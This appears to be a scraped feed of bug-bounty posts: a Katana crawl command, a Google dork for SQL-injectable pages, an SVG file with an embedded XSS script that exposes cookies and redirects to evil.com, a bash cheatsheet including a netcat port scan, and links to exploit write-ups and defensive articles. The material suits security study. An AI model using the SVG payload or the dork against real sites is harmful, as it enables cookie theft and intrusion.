Bug bounty Tips

Effective way to crawl juicy endpoints with Katana happy hunting :)

katana -u vulnweb.com -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -f qurl -jc -xhr -kf -fx -fs dn -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg

Today i got xss on my private program

Google Dork to find slqi union based injection: inurl:"index.php?id=" intext:"Warning: mysql_num_rows()"

<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /> <script type="text/javascript"> alert("You have been hacked !! " + "\n" + "Domain: " + document.domain + "\n" + "Cookie: " + document.cookie ); window.location.href="https://evil.com" </script> </svg>

Simple Bash Scripting Cheatsheet -------------------------------- [+] nano Shortcuts ctrl v Next page. ctrl y Previous page. ctrl w Where is (find). ctrl k Cut that line of test. ctrl x Exit editor. [+] Create a text file: touch file Creates an empty file. ifconfig > tmp pipe the output of a command nano file [+] Create a file and append text to it: ifconfig > tmp echo >> tmp ping google.com -c3 >> tmp [+] How to view a file: cat file Show entire contents of file. more file Show one page at a time. Space bar for next page and (q) to exit. head file Show the first 10 lines. head -15 file Show the first 15 lines. tail file Show the last 10 lines. tail -15 file Show the last 15 lines. tail -f file Useful when viewing the output of a log file. [+] pipe cat tmp | grep Bcast Feeds the output of one process to the input of another process. [+] Processes ps aux Show all running process for all users. kill -9 PID Nicely kill a PID. [+] Word Count wc -l tmp2 Count the number of lines in a file [+] cut -d delimiter -f fields [+] sort Sort by unique sort -u file sort IP addresses correct sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u Isolate the IP address [+] awk awk '{print $1}' file Show the 1st column. awk '{print $1,$5}' file Show the 1st and 5th columns. [+] grep grep -v Remove a single string. grep -v 'red' file [+] egrep -v Remove multiple strings egrep -v '(red|white|blue)' file [+] sed sed 's/FOO/BAR/g' file Replace FOO with BAR. sed 's/FOO//g' file Replace FOO with nothing. sed '/^FOO/d' file Remove lines that start with FOO. [+] colour 31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan echo -e "\e[1;34mThis is a blue text.\e[0m" Bash Scripts ------------ [+] Simple bash script: #!/bin/bash clear echo echo print "Hello world." [+] Make a file executable. chmod +x file chmod 755 file [+] Variables name=Bob echo $name user=$(whoami) echo $user echo 'Hello' $name. 'You are running as' $user. #!/bin/bash clear echo "Hello World" name=Bob ip=`ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1` echo "Hello" $name "Your IP address is:" $ip [+] User Input read -p "Domain: " domain #!/bin/bash echo "Please input your domain:" read -p "Domain:" domain ping -c 5 $domain [+] Check For No User Input if [ -z $domain ]; then echo echo "#########################" echo echo "Invalid choice." echo exit fi [+] For loops #!/bin/bash for host in $(cat hosts.txt) do command $host done [+] One Liners Port Scan: for port in $(cat Ports.txt); do nc -nzv 192.168.0.1 $port & sleep 0.5; done Use a bash loop to find the IP address behind each host: for url in $(cat list.txt); do host $url; done [+] Condition Onliner any command && if work || if not work type -p massdns && massdns -r resolver.txt -t A -o S sub.txt -w sub.mass || echo "MassDns not installed" [+] Condition Onliner with multiple action any command && { if work; also this; also this } || { if not work; also this; also this } type -p massdns && { massdns -r resolver.txt -t A -o S sub.txt -w sub.mass; cat sub.mass } || { echo "MassDns not installed"; echo "Install MassDns" }

🚨 Source Code Review 🚨 Functionality Type - Product Review Section • 🛒 A shopping site lets users leave reviews on products. Reviews are displayed on the product page. Identify Vulnerabilities in this code. How would you exploit it? Post Your Answers here : https://x.com/RadhaSec/status/1792625547740135741

How was your day guys😊

#WebApp_Security 1. FlowMate - BurpSuite extension that brings taint analysis to web apps https://github.com/usdAG/FlowMate 2. Stealing your Telegram account in 10 seconds flat https://lyra.horse/blog/2024/05/stealing-your-telegram-account-in-10-seconds-flat

#Malware_analysis 1. Cuttlefish Malware https://blog.lumen.com/eight-arms-to-hold-you-the-cuttlefish-malware 2. Router Roulette https://www.trendmicro.com/en_us/research/24/e/router-roulette.html

#Blue_Team_Techniques Manual LDAP Querying Part 1: https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb Part 2: https://posts.specterops.io/manual-ldap-querying-part-2-8a65099e12e3

#exploit 1. CVE-2024-27322: Vulnerability in R'S Deserialization (R-Bitrary Code Execution) https://hiddenlayer.com/research/r-bitrary-code-execution 2. Minecraft "Randar" exploit https://github.com/spawnmason/randar-explanation 3. CVE-2024-26131, CVE-2024-26132: Element Android Exploit https://www.shielder.com/blog/2024/04/element-android-cve-2024-26131-cve-2024-26132-never-take-intents-from-strangers

#Fuzzing #Threat_Research Fuzzing NVMe-oF/TCP Driver for Linux with Syzkaller https://www.cyberark.com/resources/threat-research-blog/your-nvme-had-been-syzed-fuzzing-nvme-of-tcp-driver-for-linux-with-syzkaller

#exploit 1. Telegram Web app XSS/Session Hijacking 1-click https://seclists.org/oss-sec/2024/q2/183 2. CVE-2019-2703: VirtualBox VM Escape https://j0nathanj.github.io/Dusting-off-the-VM-Escape 3. CVE-2024-26218: Windows PspBuildCreateProcessContext Double-Fetch / Buffer Overflow https://packetstormsecurity.com/files/178377/Windows-PspBuildCreateProcessContext-Double-Fetch-Buffer-Overflow.html

#Offensive_security 1. Relaying Kerberos Authentication from DCOM OXID Resolving https://www.tiraniddo.dev/2024/04/relaying-kerberos-authentication-from.html 2. Misconfig Mapper CLI Tool https://github.com/intigriti/misconfig-mapper

#Threat_Research CodeQL zero to hero Part 1 - The fundamentals of static analysis for vulnerability research: https://github.blog/2023-03-31-codeql-zero-to-hero-part-1-the-fundamentals-of-static-analysis-for-vulnerability-research Part 2 - Getting started with CodeQL: https://github.blog/2023-06-15-codeql-zero-to-hero-part-2-getting-started-with-codeql Part 3 - Security research with CodeQL: https://github.blog/2024-04-29-codeql-zero-to-hero-part-3-security-research-with-codeql

BlackHat ASIA 2021: A tfp0 bug for macOS <=10.15.x (PoC for CVE-2020-27904) https://www.blackhat.com/asia-21/briefings/schedule/#the-price-of-compatibility-defeating-macos-kernel-using-extended-file-attributes-21799 ]-> PoC: https://github.com/pattern-f/xattr-oob-swap

Apple Silicon Hardware Secrets: SPRR and Guarded Exception Levels (GXF) https://blog.svenpeter.dev/posts/m1_sprr_gxf

#Blue_Team_Techniques 1. Analysis of HSTS Caches of Different Browsers ]-> Forensic HSTS Analyzer: https://github.com/ernw/forensic-hsts-analyzer 2. Detecting memory management bugs with GCC 11. Part 1 - Understanding dynamic allocation https://developers.redhat.com/blog/2021/04/30/detecting-memory-management-bugs-with-gcc-11-part-1-understanding-dynamic-allocation